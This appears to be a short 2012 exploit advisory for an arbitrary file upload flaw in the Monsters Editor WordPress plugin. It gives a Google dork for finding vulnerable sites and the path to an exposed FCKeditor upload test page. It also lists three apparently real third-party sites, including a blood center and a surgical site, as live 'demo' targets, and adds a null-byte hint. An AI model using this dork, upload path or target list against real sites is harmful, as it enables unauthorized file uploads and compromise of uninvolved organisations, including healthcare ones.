WordPress Monsters Editor for WP Super Edit third party plugin suffers from an arbitrary file upload vulnerability.
bfa3057af6a3e02f48fb6b65f65dd7e6c991222ded98b2fd2ab474a331b66d8d
# Exploit Title: Wordpress Monsters Editor for WP Super Edit Arbitrary File
Upload Vulnerability
# Google Dork: inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit/
# Date: 08/22/2012
# Author: Crim3R
# download Link :
http://downloads.wordpress.org/plugin/monsters-editor-10-for-wp-super-edit.zip
# Tested on: all
==================================
D3m0:
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
http://surgical.healthase.com/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
===============Crim3R@Att.Net=========
$Home = %00
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir